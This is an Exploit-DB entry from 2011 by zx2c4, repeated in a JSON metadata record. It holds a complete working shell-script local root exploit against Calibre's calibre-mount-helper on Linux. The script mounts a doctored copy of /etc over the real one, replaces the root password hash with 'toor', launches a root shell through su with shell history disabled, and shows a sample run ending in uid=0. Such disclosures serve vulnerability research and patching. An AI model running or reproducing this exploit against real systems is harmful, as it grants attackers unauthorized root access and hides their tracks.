ID EDB-ID:18071 Type exploitdb Reporter zx2c4 Modified 2011-11-03T00:00:00
Description
Calibre E-Book Reader Local Root Exploit. Local exploit for linux platform
# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
# Date: Nov 2, 2011
# Author: zx2c4
# Software Link: http://calibre-ebook.com/
# Tested on: Gentoo
# Platform: Linux
# Category: Local
# CVE: pending
#!/bin/sh
#######################################
# .60-Calibrer Assault Mount #
# by zx2c4 #
#######################################
################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundumental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################
echo "#######################################"
echo "# .60-Calibrer Assault Mount #"
echo "# by zx2c4 #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"
{"published": "2011-11-03T00:00:00", "id": "EDB-ID:18071", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.2}, "hash": "0a0bd199edc29420c55b9be25c34f0f66961addc5033fe872216aa2cad159f1e", "description": "Calibre E-Book Reader Local Root Exploit. Local exploit for linux platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/18071/", "lastseen": "2016-02-02T09:07:28", "edition": 1, "title": "Calibre E-Book Reader Local Root Exploit", "osvdbidlist": ["76827"], "modified": "2011-11-03T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/18071/", "references": [], "reporter": "zx2c4", "sourceData": "# Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root\r\n# Date: Nov 2, 2011\r\n# Author: zx2c4\r\n# Software Link: http://calibre-ebook.com/\r\n# Tested on: Gentoo\r\n# Platform: Linux\r\n# Category: Local\r\n# CVE: pending\r\n#!/bin/sh\r\n\r\n #######################################\r\n # .60-Calibrer Assault Mount #\r\n # by zx2c4 #\r\n #######################################\r\n\r\n################################################################################\r\n# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH\r\n# and get root, in my \".50-Calibrer Assault Mount\" exploit. Today we exploit a\r\n# more fundumental issue with Calibre's mount helper -- namely, that it allows\r\n# us to mount a vfat filesystem anywhere we want. By mounting a file system\r\n# image over /etc, we are able to tinker /etc/passwd and make the root password\r\n# temporarily \"toor\".\r\n#\r\n# - zx2c4\r\n# 2011-11-2\r\n#\r\n# Usage:\r\n# $ ./60calibrerassaultmount.sh \r\n# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4\r\n# [+] Making overlay image:\r\n# 51200+0 records in\r\n# 51200+0 records out\r\n# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s\r\n# mkfs.vfat 3.0.11 (24 Dec 2010)\r\n# [+] Mounting overlay image using calibre-mount-helper.\r\n# [+] Copying /etc into overlay.\r\n# [+] Tampering with overlay's passwd.\r\n# [+] Unmounting overlay image using calibre-mount-helper.\r\n# [+] Mounting overlay to /etc using calibre-mount-helper.\r\n# [+] Asking for root. When prompted for a password, enter 'toor'.\r\n# Password: [typed in toor to the terminal] \r\n# [+] Unmounting /etc using root umount.\r\n# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4\r\n# [+] Getting shell.\r\n# sh-4.2# id\r\n# uid=0(root) gid=0(root) groups=0(root)\r\n# sh-4.2# whoami\r\n# root\r\n# sh-4.2# \r\n################################################################################\r\n\r\n\r\necho \"#######################################\"\r\necho \"# .60-Calibrer Assault Mount #\"\r\necho \"# by zx2c4 #\"\r\necho \"#######################################\"\r\necho\r\necho -n \"[+] Making temporary directory: \"\r\ndir=\"$(mktemp -d)\"\r\necho \"$dir\"\r\ncd \"$dir\"\r\necho \"[+] Making overlay image:\"\r\ndd if=/dev/zero of=overlay count=51200\r\n/usr/sbin/mkfs.vfat overlay\r\necho \"[+] Mounting overlay image using calibre-mount-helper.\"\r\nmkdir staging\r\ncalibre-mount-helper mount overlay staging\r\necho \"[+] Copying /etc into overlay.\"\r\ncd staging/\r\ncp -a /etc/* . 2>/dev/null\r\necho \"[+] Tampering with overlay's passwd.\"\r\ncat passwd | tail -n +2 > tmp\r\necho \"root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash\" >> tmp\r\nmv tmp passwd\r\necho \"[+] Unmounting overlay image using calibre-mount-helper.\"\r\ncd ..\r\ncalibre-mount-helper eject overlay staging >/dev/null 2>&1\r\necho \"[+] Mounting overlay to /etc using calibre-mount-helper.\"\r\ncalibre-mount-helper mount overlay /etc >/dev/null 2>&1\r\ncd /\r\necho \"[+] Asking for root. When prompted for a password, enter 'toor'.\"\r\nsu -c \"echo \\\"[+] Unmounting /etc using root umount.\\\"; umount /etc; echo \\\"[+] Cleaning up: $dir\\\"; rm -rf \\\"$dir\\\"; echo \\\"[+] Getting shell.\\\"; HISTFILE=\\\"/dev/null\\\" exec /bin/sh\"", "objectVersion": "1.0"}